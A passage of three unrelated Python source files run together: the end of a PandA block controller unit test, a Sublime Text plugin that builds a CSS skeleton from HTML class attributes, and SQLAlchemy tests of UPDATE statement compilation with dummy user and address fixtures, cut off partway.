b.label.put_value("A new label")
assert b.meta.label == "A new label"
assert b.label.value == "A new label"
self.client.set_field.assert_called_once_with(
"*METADATA", "LABEL_PULSE2", "A new label"
)
self.client.set_field.reset_mock()
# check updated with nothing
o.handle_changes(dict(LABEL=""), ts=TimeStamp())
assert b.meta.label == "Pulse description 2"
assert b.label.value == "Pulse description 2"
self.client.set_field.assert_not_called()
# check updated with something from the server
o.handle_changes(dict(LABEL="A server label"), ts=TimeStamp())
assert b.meta.label == "A server label"
assert b.label.value == "A server label"
self.client.set_field.assert_not_called()
help = b.help
assert help.value == "/docs/build/pulse_doc.html"
delay = b.delay
assert delay.meta.writeable is True
assert delay.meta.typeid == NumberMeta.typeid
assert delay.meta.dtype == "float64"
assert delay.meta.tags == ["group:parameters", "widget:textinput", "config:2"]
units = b.delayUnits
assert units.meta.writeable is True
assert units.meta.typeid == ChoiceMeta.typeid
assert units.meta.tags == ["group:parameters", "widget:combo", "config:1"]
assert units.meta.choices == ["s", "ms", "us"]
inp = b.inp
assert inp.meta.writeable is True
assert inp.meta.typeid == ChoiceMeta.typeid
assert inp.meta.tags == [
"group:inputs",
"sinkPort:bool:ZERO",
"widget:combo",
"badgevalue:plus:inpDelay:MRI:PULSE2",
"config:1",
]
assert inp.meta.choices == ["ZERO", "X.OUT", "Y.OUT"]
delay = b.inpDelay
assert delay.meta.writeable is True
assert delay.meta.typeid == NumberMeta.typeid
assert delay.meta.dtype == "uint8"
assert delay.meta.tags == ["group:inputs", "widget:textinput", "config:1"]
out = b.out
assert out.meta.writeable is False
assert out.meta.typeid == BooleanMeta.typeid
assert out.meta.tags == [
"group:outputs",
"sourcePort:bool:PULSE2.OUT",
"widget:led",
]
err = b.errPeriod
assert err.meta.writeable is False
assert err.meta.typeid == BooleanMeta.typeid
assert err.meta.tags == ["group:readbacks", "widget:led"]
queue = Queue()
subscribe = Subscribe(path=["MRI:PULSE2", "inp"], delta=True)
subscribe.set_callback(queue.put)
o.handle_request(subscribe)
delta = queue.get()
assert delta.changes[0][1]["value"] == "ZERO"
ts = TimeStamp()
o.handle_changes({"INP": "X.OUT"}, ts)
delta = queue.get()
assert delta.changes == [
[["value"], "X.OUT"],
[["timeStamp"], ts],
[
["meta", "tags"],
[
"group:inputs",
"sinkPort:bool:ZERO",
"widget:combo",
"badgevalue:plus:inpDelay:MRI:PULSE2",
"config:1",
"linkedvalue:out:MRI:X",
],
],
]
def test_block_fields_lut(self):
fields = OrderedDict()
block_data = BlockData(8, "Lut description", fields)
fields["FUNC"] = FieldData("param", "lut", "Function", [])
o = PandABlockController(self.client, "MRI", "LUT3", block_data, "/docs")
self.process.add_controller(o)
b = self.process.block_view("MRI:LUT3")
func = b.func
assert func.meta.writeable is True
assert func.meta.typeid == StringMeta.typeid
assert func.meta.tags == ["group:parameters", "widget:textinput", "config:1"]
queue = Queue()
subscribe = Subscribe(path=["MRI:LUT3"], delta=True)
subscribe.set_callback(queue.put)
o.handle_request(subscribe)
delta = queue.get()
assert delta.changes[0][1]["func"]["value"] == ""
assert '<path id="OR"' in delta.changes[0][1]["icon"]["value"]
# This is the correct FUNC.RAW value for !A&!B&!C&!D&!E
self.client.get_field.return_value = "1"
ts = TimeStamp()
o.handle_changes({"FUNC": "!A&!B&!C&!D&!E"}, ts)
self.client.get_field.assert_called_once_with("LUT3", "FUNC.RAW")
delta = queue.get()
assert delta.changes == [
[["func", "value"], "!A&!B&!C&!D&!E"],
[["func", "timeStamp"], ts],
[["icon", "value"], ANY],
[["icon", "timeStamp"], ts],
]
assert '<path id="OR"' not in delta.changes[2][1]
|
import sublime, sublime_plugin
import re
class CreateCssCommand(sublime_plugin.WindowCommand):
def run(self):
# gets current html file
htmlFileName = self.window.active_view().file_name()
if htmlFileName[-4:] == 'html':
htmlFile = open(htmlFileName)
classDeclarations = []
cssSheet = ""
for line in htmlFile:
try:
# finds class attribute and remembers the beginning of its value
matchOfBegin = re.search('class=[\'|\"]{1}', line)
rawCoughtText = line[matchOfBegin.end():]
# counting indentation
try:
indentationMatch = re.search('^[\s]+', line)
lenOfIndentation = indentationMatch.end() - indentationMatch.start()
except:
lenOfIndentation = 0
# finds the end of class attribute value
matchOfEnd = re.search('[\'|\"]{1}', rawCoughtText)
rawClassNames = rawCoughtText[:matchOfEnd.start()]
# for the case if we have more than one class
try:
classNames = ''
classNamesList = rawClassNames.split()
for name in classNamesList:
classNames = classNames + '.' + name
classDeclarations.append((classNames, lenOfIndentation))
except:
continue
except:
continue
# if the first element with class has an indentation,
# it will shift all indentations with this correction
indentationCorrection = classDeclarations[0][1]
# creates css skeleton with found classes
for className, indentationsNum in classDeclarations:
if indentationCorrection:
indentationsNum = indentationsNum - indentationCorrection
cssSheet = cssSheet + ' ' * indentationsNum + className + ' ' + "{}\n"
# creates a new file, sets css syntax highlight
# and writes created css skeleton
newCssFile = self.window.new_file()
newCssFile.set_syntax_file('Packages/CSS/CSS.tmLanguage')
newCssFile.run_command("insert_snippet", {"contents": cssSheet})
|
from sqlalchemy import bindparam
from sqlalchemy import column
from sqlalchemy import exc
from sqlalchemy import exists
from sqlalchemy import ForeignKey
from sqlalchemy import func
from sqlalchemy import Integer
from sqlalchemy import literal
from sqlalchemy import MetaData
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import table
from sqlalchemy import testing
from sqlalchemy import text
from sqlalchemy import update
from sqlalchemy import util
from sqlalchemy.dialects import mysql
from sqlalchemy.engine import default
from sqlalchemy.sql import operators
from sqlalchemy.sql.elements import BooleanClauseList
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import AssertsCompiledSQL
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
class _UpdateFromTestBase(object):
@classmethod
def define_tables(cls, metadata):
Table(
"mytable",
metadata,
Column("myid", Integer),
Column("name", String(30)),
Column("description", String(50)),
)
Table(
"myothertable",
metadata,
Column("otherid", Integer),
Column("othername", String(30)),
)
Table(
"users",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("name", String(30), nullable=False),
)
Table(
"addresses",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("user_id", None, ForeignKey("users.id")),
Column("name", String(30), nullable=False),
Column("email_address", String(50), nullable=False),
)
Table(
"dingalings",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("address_id", None, ForeignKey("addresses.id")),
Column("data", String(30)),
)
Table(
"update_w_default",
metadata,
Column("id", Integer, primary_key=True),
Column("x", Integer),
Column("ycol", Integer, key="y"),
Column("data", String(30), onupdate=lambda: "hi"),
)
@classmethod
def fixtures(cls):
return dict(
users=(
("id", "name"),
(7, "jack"),
(8, "ed"),
(9, "fred"),
(10, "chuck"),
),
addresses=(
("id", "user_id", "name", "email_address"),
(1, 7, "x", "jack@bean.com"),
(2, 8, "x", "ed@wood.com"),
(3, 8, "x", "ed@bettyboop.com"),
(4, 8, "x", "ed@lala.com"),
(5, 9, "x", "fred@fred.com"),
),
dingalings=(
("id", "address_id", "data"),
(1, 2, "ding 1/2"),
(2, 5, "ding 2/5"),
),
)
class UpdateTest(_UpdateFromTestBase, fixtures.TablesTest, AssertsCompiledSQL):
__dialect__ = "default_enhanced"
def test_update_literal_binds(self):
table1 = self.tables.mytable
table1 = self.tables.mytable
stmt = (
table1.update().values(name="jack").where(table1.c.name == "jill")
)
self.assert_compile(
stmt,
"UPDATE mytable SET name='jack' WHERE mytable.name = 'jill'",
literal_binds=True,
)
def test_correlated_update_one(self):
table1 = self.tables.mytable
# test against a straight text subquery
u = update(
table1,
values={
table1.c.name: text(
"(select name from mytable where id=mytable.id)"
)
},
)
self.assert_compile(
u,
"UPDATE mytable SET name=(select name from mytable "
"where id=mytable.id)",
)
def test_correlated_update_two(self):
table1 = self.tables.mytable
mt = table1.alias()
u = update(
table1,
values={
table1.c.name: select([mt.c.name], mt.c.myid == table1.c.myid)
},
)
self.assert_compile(
u,
"UPDATE mytable SET name=(SELECT mytable_1.name FROM "
"mytable AS mytable_1 WHERE "
"mytable_1.myid = mytable.myid)",
)
def test_correlated_update_three(self):
table1 = self.tables.mytable
table2 = self.tables.myothertable
# test against a regular constructed subquery
s = select([table2], table2.c.otherid == table1.c.myid)
u = update(table1, table1.c.name == "jack", values={table1.c.name: s})
self.assert_compile(
u,
"UPDATE mytable SET name=(SELECT myothertable.otherid, "
"myothertable.othername FROM myothertable WHERE "
"myothertable.otherid = mytable.myid) "
"WHERE mytable.name = :name_1",
)
def test_correlated_update_four(self):
table1 = self.tables.mytable
table2 = self.tables.myothertable
# test a non-correlated WHERE clause
s = select([table2.c.othername], table2.c.otherid == 7)
u = update(table1, table1.c.name == s.scalar_subquery())
self.assert_compile(
u,
"UPDATE mytable SET myid=:myid, name=:name, "
"description=:description WHERE mytable.name = "
"(SELECT myothertable.othername FROM myothertable "
"WHERE myothertable.otherid = :otherid_1)",
)
def test_correlated_update_five(self):
table1 = self.tables.mytable
table2 = self.tables.myothertable
# test one that is actually correlated...
s = select([table2.c.othername], table2.c.otherid == table1.c.myid)
u = table1.update(table1.c.name == s.scalar_subquery())
self.assert_compile(
u,
"UPDATE mytable SET myid=:myid, name=:name, "
"description=:description WHERE mytable.name = "
"(SELECT myothertable.othername FROM myothertable "
"WHERE myothertable.otherid = mytable.myid)",
)
def test_correlated_update_six(self):
table1 = self.tables.mytable
table2 = self.tables.myothertable
# test correlated FROM implicit in WHERE and SET clauses
u = (
table1.update()
.values(name=table2.c.othername)
.where(table2.c.otherid == table1.c.myid)
)
self.assert_compile(
u,
"UPDATE mytable SET name=myothertable.othername "
"FROM myothertable WHERE myothertable.otherid = mytable.myid",
)
def test_correlated_update_seven(self):
table1 = self.tables.mytable
table2 = self.tables.myothertable
u = (
table1.update()
.values(name="foo")
.where(table2.c.otherid == table1.c.myid)
)
# this is the "default_enhanced" compiler. there's no UPDATE FROM
# in the base compiler.
# See also test/dialect/mssql/test_compiler->test_update_from().
self.assert_compile(
u,
"UPDATE mytable SET name=:name "
"FROM myothertable WHERE myothertable.otherid = mytable.myid",
)
def test_binds_that_match_columns(self):
"""test bind params named after column names
replace the normal SET/VALUES generation."""
t = table("foo", column("x"), column("y"))
u = t.update().where(t.c.x == bindparam("x"))
assert_raises(exc.CompileError, u.compile)
self.assert_compile(u, "UPDATE foo SET WHERE foo.x = :x", params={})
assert_raises(exc.CompileError, u.values(x=7).compile)
self.assert_compile(
u.values(y=7), "UPDATE foo SET y=:y WHERE foo.x = :x"
)
assert_raises(
exc.CompileError, u.values(x=7).compile, column_keys=["x", "y"]
)
assert_raises(exc.CompileError, u.compile, column_keys=["x", "y"])
self.assert_compile(
u.values(x=3 + bindparam("x")),
"UPDATE foo SET x=(:param_1 + :x) WHERE foo.x = :x",
)
self.assert_compile(
u.values(x=3 + bindparam("x")),
"UPDATE foo SET x=(:param_1 + :x) WHERE foo.x = :x",
params={"x": 1},
)
self.assert_compile(
u.values(x=3 + bindparam("x")),
"UPDATE foo SET x=(:param_1 + :x), y=:y WHERE foo.x = :x",
params={"x": 1, "y": 2},
)
def test_labels_no_collision(self):
t = table("foo", column("id"), column("foo_id"))
self.assert_compile(
t.update().where(t.c.id == 5),
"UPDATE foo SET id=:id, foo_id=:foo_id WHERE foo.id = :id_1",
)
self.assert_compile(
t.update().where(t.c.id == bindparam(key=t.c.id._label)),
"UPDATE foo SET id=:id, foo_id=:foo_id WHERE foo.id = :foo_id_1",
)
def test_labels_no_collision_index(self):
"""test for [ticket:4911] """
t = Table(
"foo",
MetaData(),
Column("id", Integer, index=True),
Column("foo_id", Integer),
)
self.assert_compile(
t.update().where(t.c.id == 5),
"UPDATE foo SET id=:id, foo_id=:foo_id WHERE foo.id = :id_1",
)
self.assert_compile(
t.update().where(t.c.id == bindparam(key=t.c.id._label)),
"UPDATE foo SET id=:id, foo_id=:foo_id WHERE foo.id = :foo_id_1",
)
def test_inline_defaults(self):
m = MetaData()
foo = Table("foo", m, Column("id", Integer))
t = Table(
"test",
m,
Column("col1", Integer, onupdate=func.foo(1)),
Column(
"col2",
Integer,
onupdate=select([func.coalesce(func.max(foo.c.id))]),
),
Column("col3", String(30)),
)
self.assert_compile(
t.update(inline=True, values={"col3": "foo"}),
"UPDATE test SET col1=foo(:foo_1), col2=(SELECT "
"coalesce(max(foo.id)) AS coalesce_1 FROM foo), "
"col3=:col3",
)
def test_update_1(self):
table1 = self.tables.mytable
self.assert_compile(
update(table1, table1.c.myid == 7),
"UPDATE mytable SET name=:name WHERE mytable.myid = :myid_1",
params={table1.c.name: "fred"},
)
def test_update_2(self):
table1 = self.tables.mytable
self.assert_compile(
table1.update()
.where(table1.c.myid == 7)
.values({table1.c.myid: 5}),
"UPDATE mytable SET myid=:myid WHERE mytable.myid = :myid_1",
checkparams={"myid": 5, "myid_1": 7},
)
def test_update_3(self):
table1 = self.tables.mytable
self.assert_compile(
update(table1, table1.c.myid == 7),
"UPDATE mytable SET name=:name WHERE mytable.myid = :myid_1",
params={"name": "fred"},
)
def test_update_4(self):
table1 = self.tables.mytable
self.assert_compile(
update(table1, values={table1.c.name: table1.c.myid}),
"UPDATE mytable SET name=mytable.myid",
)
def test_update_5(self):
table1 = self.tables.mytable
self.assert_compile(
update(
table1,
whereclause=table1.c.name == bindparam("crit"),
values={table1.c.name: "hi"},
),
"UPDATE mytable SET name=:name WHERE mytable.name = :crit",
params={"crit": "notthere"},
checkparams={"crit": "notthere", "name": "hi"},
)
def test_update_6(self):
table1 = self.tables.mytable
self.assert_compile(
update(
table1,
table1.c.myid == 12,
values={table1.c.name: table1.c.myid},
),
"UPDATE mytable "
"SET name=mytable.myid, description=:description "
"WHERE mytable.myid = :myid_1",
params={"description": "test"},
checkparams={"description": "test", "myid_1": 12},
)
def test_update_7(self):
table1 = self.tables.mytable
self.assert_compile(
update(table1, table1.c.myid == 12, values={table1.c.myid: 9}),
"UPDATE mytable "
"SET myid=:myid, description=:description "
"WHERE mytable.myid = :myid_1",
params={"myid_1": 12, "myid": 9, "description": "test"},
)
def test_update_8(self):
table1 = self.tables.mytable
self.assert_compile(
update(table1, table1.c.myid == 12),
"UPDATE mytable SET myid=:myid WHERE mytable.myid = :myid_1",
params={"myid": 18},
checkparams={"myid": 18, "myid_1": 12},
)
def test_update_9(self):
table1 = self.tables.mytable
s = table1.update(table1.c.myid == 12, values={table1.c.name: "lala"})
c = s.compile(column_keys=["id", "name"])
eq_(str(s), str(c))
def test_update_10(self):
table1 = self.tables.mytable
v1 = {table1.c.name: table1.c.myid}
v2 = {table1.c.name: table1.c.name + "foo"}
self.assert_compile(
update(table1, table1.c.myid == 12, values=v1).values(v2),
"UPDATE mytable "
"SET "
"name=(mytable.name || :name_1), "
"description=:description "
"WHERE mytable.myid = :myid_1",
params={"description": "test"},
)
def test_update_11(self):
table1 = self.tables.mytable
values = {
table1.c.name: table1.c.name + "lala",
table1.c.myid: func.do_stuff(table1.c.myid, literal("hoho")),
}
self.assert_compile(
update(
table1,
(table1.c.myid == func.hoho(4))
& (
table1.c.name
== literal("foo") + table1.c.name + literal("lala")
),
values=values,
),
"UPDATE mytable "
"SET "
"myid=do_stuff(mytable.myid, :param_1), "
"name=(mytable.name || :name_1) "
"WHERE "
"mytable.myid = hoho(:hoho_1) AND "
"mytable.name = :param_2 || mytable.name || :param_3",
)
def test_unconsumed_names_kwargs(self):
t = table("t", column("x"), column("y"))
assert_raises_message(
exc.CompileError,
"Unconsumed column names: z",
t.update().values(x=5, z=5).compile,
)
def test_unconsumed_names_values_dict(self):
t = table("t", column("x"), column("y"))
t2 = table("t2", column("q"), column("z"))
assert_raises_message(
exc.CompileError,
"Unconsumed column names: j",
t.update()
.values(x=5, j=7)
.values({t2.c.z: 5})
.where(t.c.x == t2.c.q)
.compile,
)
def test_unconsumed_names_kwargs_w_keys(self):
t = table("t", column("x"), column("y"))
assert_raises_message(
exc.CompileError,
"Unconsumed column names: j",
t.update().values(x=5, j=7).compile,
column_keys=["j"],
)
def test_update_ordered_parameters_1(self):
table1 = self.tables.mytable
# Confirm that we can pass values as list value pairs
# note these are ordered *differently* from table.c
values = [
(table1.c.name, table1.c.name + "lala"),
(table1.c.myid, func.do_stuff(table1.c.myid, literal("hoho"))),
]
self.assert_compile(
update(
table1,
(table1.c.myid == func.hoho(4))
& (
table1.c.name
== literal("foo") + table1.c.name + literal("lala")
),
preserve_parameter_order=True,
values=values,
),
"UPDATE mytable "
"SET "
"name=(mytable.name || :name_1), "
"myid=do_stuff(mytable.myid, :param_1) "
"WHERE "
"mytable.myid = hoho(:hoho_1) AND "
"mytable.name = :param_2 || mytable.name || :param_3",
)
def test_update_ordered_parameters_2(self):
table1 = self.tables.mytable
# Confirm that we can pass values as list value pairs
# note these are ordered *differently* from table.c
values = [
(table1.c.name, table1.c.name + "lala"),
("description", "some desc"),
(table1.c.myid, func.do_stuff(table1.c.myid, literal("hoho"))),
]
self.assert_compile(
update(
table1,
(table1.c.myid == func.hoho(4))
& (
table1.c.name
== literal("foo") + table1.c.name + literal("lala")
),
preserve_parameter_order=True,
).values(values),
"UPDATE mytable "
"SET "
"name=(mytable.name || :name_1), "
"description=:description, "
"myid=do_stuff(mytable.myid, :param_1) "
"WHERE "
"mytable.myid = hoho(:hoho_1) AND "
"mytable.name = :param_2 || mytable.name || :param_3",
)
def test_update_ordered_parameters_fire_onupdate(self):
table = self.tables.update_w_default
values = [(table.c.y, table.c.x + 5), ("x", 10)]
self.assert_compile(
table.update(preserve_parameter_order=True).values(values),
"UPDATE update_w_default SET ycol=(update_w_default.x + :x_1), "
"x=:x, data=:data",
)
def test_update_ordered_parameters_override_onupdate(self):
table = self.tables.update_w_default
values = [
(table.c.y, table.c.x + 5),
(table.c.data, table.c.x + 10),
("x", 10),
]
self.assert_compile(
table.update(preserve_parameter_order=True).values(values),
"UPDATE update_w_default SET ycol=(update_w_default.x + :x_1), "
"data=(update_w_default.x + :x_2), x=:x",
)
def test_update_preserve_order_reqs_listtups(self):
table1 = self.tables.mytable
testing.assert_raises_message(
ValueError,
r"When preserve_parameter_order is True, values\(\) "
r"only accepts a list of 2-tuples",
table1.update(preserve_parameter_order=True).values,
{"description": "foo", "name": "bar"},
)
def test_update_ordereddict(self):
table1 = self.tables.mytable
# Confirm that ordered dicts are treated as normal dicts,
# columns sorted in table order
values = util.OrderedDict(
(
(table1.c.name, table1.c.name + "lala"),
(table1.c.myid, func.do_stuff(table1.c.myid, literal("hoho"))),
)
)
self.assert_compile(
update(
table1,
(table1.c.myid == func.hoho(4))
& (
table1.c.name
== literal("foo") + table1.c.name + literal("lala")
),
values=values,
),
"UPDATE mytable "
"SET "
"myid=do_stuff(mytable.myid, :param_1), "
"name=(mytable.name || :name_1) "
"WHERE "
"mytable.myid = hoho(:hoho_1) AND "
"mytable.name = :param_2 || mytable.name || :param_3",
)
def test_where_empty(self):
table1 = self.tables.mytable
self.assert_compile(
table1.update().where(
BooleanClauseList._construct_raw(operators.and_)
),
"UPDATE mytable SET myid=:myid, name=:name, "
"description=:description",
)
self.assert_compile(
table1.update().where(
BooleanClauseList._construct_raw(operators.or_)
),
"UPDATE mytable SET myid=:myid, name=:name, "
"description=:description",
)
def test_prefix_with(self):
table1 = self.tables.mytable
stmt = (
table1.update()
.prefix_with("A", "B", dialect="mysql")
.prefix_with("C", "D")
)
self.assert_compile(
stmt,
"UPDATE C D mytable SET myid=:myid, name=:name, "
"description=:description",
)
self.assert_compile(
stmt,
"UPDATE A B C D mytable SET myid=%s, name=%s, description=%s",
dialect=mysql.dialect(),
)
def test_update_to_expression(self):
"""test update from an expression.
this logic is triggered currently by a left side that doesn't
have a key. The current supported use case is updating the index
of a PostgreSQL ARRAY type.
"""
table1 = self.tables.mytable
expr = func.foo(table1.c.myid)
eq_(expr.key, None)
self.assert_compile(
table1.update().values({expr: "bar"}),
"UPDATE mytable SET foo(myid)=:param_1",
)
def test_update_bound_ordering(self):
"""test that bound parameters between the UPDATE and FROM clauses
order correctly in different SQL compilation scenarios.
"""
table1 = self.tables.mytable
table2 = self.tables.myothertable
sel = select([table2]).where(table2.c.otherid == 5).alias()
upd = (
table1.update()
.where(table1.c.name == sel.c.othername)
.values(name="foo")
)
dialect = default.StrCompileDialect()
dialect.positional = True
self.assert_compile(
upd,
"UPDATE mytable SET name=:name FROM (SELECT "
"myothertable.otherid AS otherid, "
"myothertable.othername AS othername "
"FROM myothertable "
"WHERE myothertable.otherid = :otherid_1) AS anon_1 "
"WHERE mytable.name = anon_1.othername",
checkpositional=("foo", 5),
dialect=dialect,
)
self.assert_compile(
upd,
"UPDATE mytable, (SELECT myothertable.otherid AS otherid, "
"myothertable.othername AS othername "
"FROM myothertable "
"WHERE myothertable.otherid = %s) AS anon_1 SET mytable.name=%s "
"WHERE mytable.name = anon_1.othername",
checkpositional=(5, "foo"),
dialect=mysql.dialect(),
)
class UpdateFromCompileTest(
_UpdateFromTestBase, fixtures.TablesTest, AssertsCompiledSQL
):
__dialect__ = "default_enhanced"
run_create_tables = run_inserts = run_deletes = None
def test_alias_one(self):
table1 = self.tables.mytable
talias1 = table1.alias("t1")
# this case is nonsensical. the UPDATE is entirely
# against the alias, but we name the table-bound column
# in values. The behavior here isn't really defined
self.assert_compile(
update(talias1, talias1.c.myid == 7).values(
{table1.c.name: "fred"}
),
"UPDATE mytable AS t1 "
"SET name=:name "
"WHERE t1.myid = :myid_1",
)
def test_alias_two(self):
table1 = self.tables.mytable
talias1 = table1.alias("t1")
# Here, compared to
# test_alias_one(), here we actually have UPDATE..FROM,
# which is causing the "table1.c.name" param to be handled
# as an "extra table", hence we see the full table name rendered.
self.assert_compile(
update(talias1, table1.c.myid == 7).values(
{table1.c.name: "fred"}
),
"UPDATE mytable AS t1 "
"SET name=:mytable_name "
"FROM mytable "
"WHERE mytable.myid = :myid_1",
checkparams={"mytable_name": "fred", "myid_1": 7},
)
def test_alias_two_mysql(self):
table1 = self.tables.mytable
talias1 = table1.alias("t1")
self.assert_compile(
update(talias1, table1.c.myid == 7).values(
{table1.c.name: "fred"}
),
"UPDATE mytable AS t1, mytable SET mytable.name=%s "
"WHERE mytable.myid = %s",
checkparams={"mytable_name": "fred", "myid_1": 7},
dialect="mysql",
)
def test_update_from_multitable_same_name_mysql(self):
users, addresses = self.tables.users, self.tables.addresses
self.assert_compile(
users.update()
.values(name="newname")
.values({addresses.c.name: "new address"})
.where(users.c.id == addresses.c.user_id),
"UPDATE users, addresses SET addresses.name=%s, "
"users.name=%s WHERE users.id = addresses.user_id",
checkparams={"addresses_name": "new address", "name": "newname"},
dialect="mysql",
)
def test_update_from_join_mysql(self):
users, addresses = self.tables.users, self.tables.addresses
j = users.join(addresses)
self.assert_compile(
update(j)
.values(name="newname")
.where(addresses.c.email_address == "e1"),
""
"UPDATE users "
"INNER JOIN addresses ON users.id = addresses.user_id "
"SET users.name=%s "
"WHERE "
"addresses.email_address = %s",
checkparams={"email_address_1": "e1", "name": "newname"},
dialect=mysql.dialect(),
)
def test_render_table(self):
users, addresses = self.tables.users, self.tables.addresses
self.assert_compile(
users.update()
.values(name="newname")
.where(users.c.id == addresses.c.user_id)
.where(addresses.c.email_address == "e1"),
"UPDATE users "
"SET name=:name FROM addresses "
"WHERE "
"users.id = addresses.user_id AND "
"addresses.email_address = :email_address_1",
checkparams={"email_address_1": "e1", "name": "newname"},
)
def test_render_multi_table(self):
users = self.tables.users
addresses = self.tables.addresses
dingalings = self.tables.dingalings
checkparams = {"email_address_1": "e1", "id_1": 2, "name": "newname"}
self.assert_compile(
users.update()
.values(name="newname")
.where(users.c.id == addresses.c.user_id)
.where(addresses.c.email_address == "e1")
.where(addresses.c.id == dingalings.c.address_id)
.where(dingalings.c.id == 2),
"UPDATE users "
"SET name=:name "
"FROM addresses, dingalings "
"WHERE "
"users.id = addresses.user_id AND "
"addresses.email_address = :email_address_1 AND "
"addresses.id = dingalings.address_id AND "
"dingalings.id = :id_1",
checkparams=checkparams,
)
def test_render_table_mysql(self):
users, addresses = self.tables.users, self.tables.addresses
self.assert_compile(
users.update()
.values(name="newname")
.where(users.c.id == addresses.c.user_id)
.where(addresses.c.email_address == "e1"),
"UPDATE users, addresses "
"SET users.name=%s "
"WHERE "
"users.id = addresses.user_id AND "
"addresses.email_address = %s",
checkparams={"email_address_1": "e1", "name": "newname"},
dialect=mysql.dialect(),
)
def test_render_subquery(self):
users, addresses = self.tables.users, self.tables.addresses
checkparams = {"email_address_1": "e1", "id_1": 7, "name": "newname"}
cols = [addresses.c.id, addresses.c.user_id, addresses.c.email_address]
subq = select(cols).where(addresses.c.id == 7).alias()
self.assert_compile(
users.update()
.values(name="newname")
.where(users.c.id == subq.c.user_id)
.where(subq.c.email_address == "e1"),
"UPDATE users "
"SET name=:name FROM ("
"SELECT "
"addresses.id AS id, "
"addresses.user_id AS user_id, "
"addresses.email_address AS email_address "
"FROM addresses "
"WHERE addresses.id = :id_1"
") AS anon_1 "
"WHERE users.id = anon_1.user_id "
"AND anon_1.email_address = :email_address_1",
checkparams=checkparams,
)
def test_correlation_to_extra(self):
users, addresses = self.tables.users, self.tables.addresses
stmt = (
users.update()
.values(name="newname")
.where(users.c.id == addresses.c.user_id)
.where(
~exists()
.where(addresses.c.user_id == users.c.id)
.where(addresses.c.email_address == "foo")
.correlate(addresses)
)
)
self.assert_compile(
stmt,
"UPDATE users SET name=:name FROM addresses WHERE "
"users.id = addresses.user_id AND NOT "
"(EXISTS (SELECT * FROM users WHERE addresses.user_id = users.id "
"AND addresses.email_address = :email_address_1))",
)
def test_dont_correlate_to_extra(self):
users, addresses = self.tables.users, self.tables.addresses
stmt = (
users.update()
.values(name="newname")
.where(users.c.id == addresses.c.user_id)
.where(
~exists()
.where(addresses.c.user_id == users.c.id)
.where(addresses.c.email_address == "foo")
.correlate()
)
)
self.assert_compile(
stmt,
"UPDATE users SET name=:name FROM addresses WHERE "
"users.id = addresses.user_id AND NOT "
"(EXISTS (SELECT * FROM addresses, users "
"WHERE addresses.user_id = users.id "
"AND addresses.email_address = :email_address_1))",
)
def test_autocorrelate_error(self):
users, addresses = self.tables.users, self.tables.addresses
stmt = (
users.update()
.values(name="newname")
.where(users.c.id == addresses.c.user_id)
.where(
~exists()
.where(addresses.c.user_id == users.c.id)
.where(addresses.c.email_address == "foo")
)
)
assert_raises_message(
exc.InvalidRequestError,
".*returned no FROM clauses due to auto-correlation.*",
stmt.compile,
dialect=default.StrCompileDialect(),
)
class UpdateFromRoundTripTest(_UpdateFromTestBase, fixtures.TablesTest):
__backend__ = True
@testing.requires.update_from
def test_exec_two_table(self):
users, addresses = self.tables.users, self.tables.addresses
testing.db.execute(
addresses.update()
.values(email_address=users.c.name)
.where(users.c.id == addresses.c.user_id)
.where(users.c.name == "ed")
)
expected = [
(1, 7, "x", "jack@bean.com"),
(2, 8, "x", "ed"),
(3, 8, "x", "ed"),
(4, 8, "x", "ed"),
(5, 9, "x", "fred@fred.com"),
]
self._assert_addresses(addresses, expected)
@testing.requires.update_from
def test_exec_two_table_plus_alias(self):
users, addresses = self.tables.users, self.tables.addresses
a1 = addresses.alias()
testing.db.execute(
addresses.update()
.values(email_address=users.c.name)
.where(users.c.id == a1.c.user_id)
.where(users.c.name == "ed")
.where(a1.c.id == addresses.c.id)
)
expected = [
(1, 7, "x", "jack@bean.com"),
(2, 8, "x", "ed"),
(3, 8, "x", "ed"),
(4, 8, "x", "ed"),
(5, 9, "x", "fred@fred.com"),
]
self._assert_addresses(addresses, expected)
@testing.requires.update_from
def test_exec_three_table(self):
users = self.tables.users
addresses = self.tables.addresses
dingalings = self.tables.dingalings
testing.db.execute(
addresses.update()
.values(email_address=users.c.name)
.where(users.c.id == addresses.c.user_id)
.where(users.c.name == "ed")
.where(addresses.c.id == dingalings.c.address_id)
.where(dingalings.c.id == 1)
)
expected = [
(1, 7, "x", "jack@bean.com"),
(2, 8, "x", "ed"),
(3, 8, "x", "ed@bettyboop.com"),
(4, 8, "x", "ed@lala.com"),
(5, 9, "x", "fred@fred.com"),
]
self._assert_addresses(addresses, expected)
@testing.only_on("mysql", "Multi table update")
def test_exec_multitable(self):
users, addresses = self.tables.users, self.tables.addresses
values = {addresses.c.email_address: "updated", users.c.name: "ed2"}
testing.db.execute(
addresses.update()
.values(values)
.where(users.c.id == addresses.c.user_id)
.where(users.c.name == "ed")
)
expected = [
(1, 7, "x", "jack@bean.com"),
(2, 8, "x", "updated"),
(3, 8, "x", "updated"),
(4, 8, "x", "updated"),
(5, 9, "x", "fred@fred.com"),
]
self._assert_addresses(addresses, expected)
expected = [(7, "jack"), (8, "ed2"), (9, "fred"), (10, "chuck")]
self._assert_users(users, expected)
@testing.only_on("mysql", "Multi table update")
def test_exec_join_multitable(self):
users, addresses = self.tables.users, self.tables.addresses
values = {addresses.c.email_address: "updated", users.c.name: "ed2"}
testing.db.execute(
update(users.join(addresses))
.values(values)
.where(users.c.name == "ed")
)
expected = [
(1, 7, "x", "jack@bean.com"),
(2, 8, "x", "updated"),
(3, 8, "x", "updated"),
(4, 8, "x", "updated"),
(5, 9, "x", "fred@fred.com"),
]
self._assert_addresses(addresses, expected)
expected = [(7, "jack"), (8, "ed2"), (9, "fred"), (10, "chuck")]
self._assert_users(users, expected)
@testing.only_on("mysql", "Multi table update")
def test_exec_multitable_same_name(self):
users, addresses = self.tables.users, self.tables.addresses
values = {addresses.c.name: "ad_ed2", users.c.name: "ed2"}
testing.db.execute(
addresses.update()
.values(values)
.where(users.c.id == addresses.c.user_id)
.where(users.c.name == "ed")
)
expected = [
(1, 7, "x", "jack@bean.com"),
